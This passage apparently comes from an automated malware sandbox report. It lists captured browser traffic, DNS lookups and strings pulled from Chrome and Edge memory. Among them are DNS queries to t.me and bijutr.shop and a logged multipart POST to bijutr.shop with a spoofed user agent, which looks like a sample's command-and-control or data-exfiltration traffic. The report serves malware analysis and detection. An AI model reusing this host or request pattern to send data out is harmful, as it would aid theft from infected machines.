                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735284048285&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5f47d732c1f847c1915dbc05f2d1c1c0&activityId=5f47d732c1f847c1915dbc05f2d1c1c0&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1
                  Source: global trafficHTTP traffic detected: GET /b?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1735284048287&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2BA4C89BEAD6644B32BDDDF9EBCF652E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=14Ebfe52359236eb26440091735284049; XID=14Ebfe52359236eb26440091735284049
                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735284048285&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5f47d732c1f847c1915dbc05f2d1c1c0&activityId=5f47d732c1f847c1915dbc05f2d1c1c0&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=88BD196131DF4F6484A57ED6AE89D619&MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1; SM=T
                  Source: 7356765f-5cd8-4500-bf3a-671ab4e8ef14.tmp.16.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: 000003.log6.16.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                  Source: 000003.log6.16.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                  Source: 000003.log6.16.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2322774223.00001E90000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2322774223.00001E90000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000003.2244654841.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2244298965.00001E9000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2244392508.00001E9000F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                  Source: chrome.exe, 0000000B.00000003.2244654841.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2244298965.00001E9000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2244392508.00001E9000F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                  Source: chrome.exe, 0000000B.00000002.2322774223.00001E90000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ht/www.youtube.com/J equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326962003.00001E9000CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327098835.00001E9000D08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlbag equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlncmN? equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ty" equals www.youtube.com (Youtube)
                  Source: chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: t.me
                  Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----16FKXLF3EKF37YUAS0RIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                  Source: chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
